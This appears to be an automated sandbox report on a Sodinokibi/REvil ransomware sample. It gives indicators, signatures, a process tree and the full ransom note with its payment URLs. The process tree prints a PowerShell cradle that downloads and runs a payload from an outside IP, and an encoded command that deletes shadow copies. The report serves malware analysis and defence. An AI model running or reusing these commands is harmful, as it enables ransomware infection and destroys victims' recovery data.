Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    138s
  • resource
    win7v191014
  • submitted
    01-01-2020 14:10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ZrxYpNuy.bat

  • Sample

    200101-gdmshj7yc6

  • SHA256

    cc4308d9ba991039ebc6e0e8fbd42c941d669e4e71248290766da05390f18cff

Score
10/10
ransomwareevasionspywaretrojansodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/ZrxYpNuy

Extracted

Language
ps1
Source

Extracted

Path

C:\wm4l3l0-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension wm4l3l0. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BAD4040FE6406E97 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/BAD4040FE6406E97 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 1y0O16BqmnxuQsXbMlNNh3ddaFg/EIiMay8xQGc8EI4/60rf0VZuf57GPdp0YFtT h2OSPEODDOVAKERJk2swV1jssgdaZ9cehiPJDhWoAvtT1T5ALzswadus23e1ROMX l8LSVhn/FvvGLTP4Psw5aRC1veGj2swzrcVdnBqbCKoWTckdCN6wPG0wX+fOiShH BLVbOVtaUpcfgEYNGEyceX6Lmm2g7VkmqtjSdgMEPv+YjFIiG50X3Tqi499eLv75 Ht4noewGAfo004Jy8RXFWhAYiQ5a/SCKkg8vK3O5HIlhnumeKaXArE8ymFCbWaHz 9M4Dj04ANgq4Wd4lFegMMvCWSdv0B6ZWLpTTE+bGr7rIGFvPKh1izd3AVNoJ/hkO NyMDk8i8WiCvxEiUdW1aZQtNaAOUNeipmdMz6Gc5Aml9gUCkOQLMKx2YGM2t7/Ia VfA74r2KJygkzXJXhvj6Bu5/QV4EXNuxmgmwWheJijGzn4JMbKAPwcPObuYpbREX N98dlpcJWLyydzVepHkQMa8FMnaPGCEn9UKDJfKA4170CSzJGD4DAOKPUbb6dNm2 FF/9zcFz1b12h2IF1s3H0ONDzENm1DmDyPalKJu/djSwYZllg8rLCA7AwWp5sHqs NcDxZzhDA05LWZW5A9mEiPQwA251nIre62As9hHBmL/tNzOYeAgoXFZHSjUjWopB /EdLnsCT2p3Q88sOjB67X/fQEJpPXKH/D0nFPDauyiM8AXz6IlvbzKzAo2SQ1wwa WyzYvQxQSmwipdZyHNWpeZT34YKPPtHbpsddOtmi1hDwCn8YwhBnQeVM+ly15UmU ytOPzSsZxlJ6Pew82exycX1nyxXt20F/vNZwSxpmy775/yB4Df8ErUzvnmSHbIC5 fRYAweHDsxn0CID//DWynfXqjiPEv30E2xA4cDLFzVftdJCz9LaZkydKqLstvLnM OudmzAMrhHoGVRjXxE80qY3Z5oj4vh8xds8UbDaOycXaDQyBXYweNfD/yrCEfzlp qvc5yfyTXcj+rJG9OnUkHmrFGrGa3aq/Qj3AUAkzH0P9fkZ5DCrWP1GTBfK2jpjj 1aLIzQYDqm/JD6FEIaaI2nvzV6Snam+IqCVOMw7Gi7lXsKtZzAqpT58iyMLQLF6M T/O+PkLAvFHUVKzxSo8= Extension name: wm4l3l0 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BAD4040FE6406E97

http://decryptor.top/BAD4040FE6406E97

Signatures

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

    ransomwaresodinokibi
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
    ransomware
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Drops file in Program Files directory 33 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ZrxYpNuy.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1124
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ZrxYpNuy');Invoke-OIRATFOLWFEAVV;Start-Sleep -s 10000"
      2⤵
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Discovering connected drives
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Drops file in Program Files directory
      PID:332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1332
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1772

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit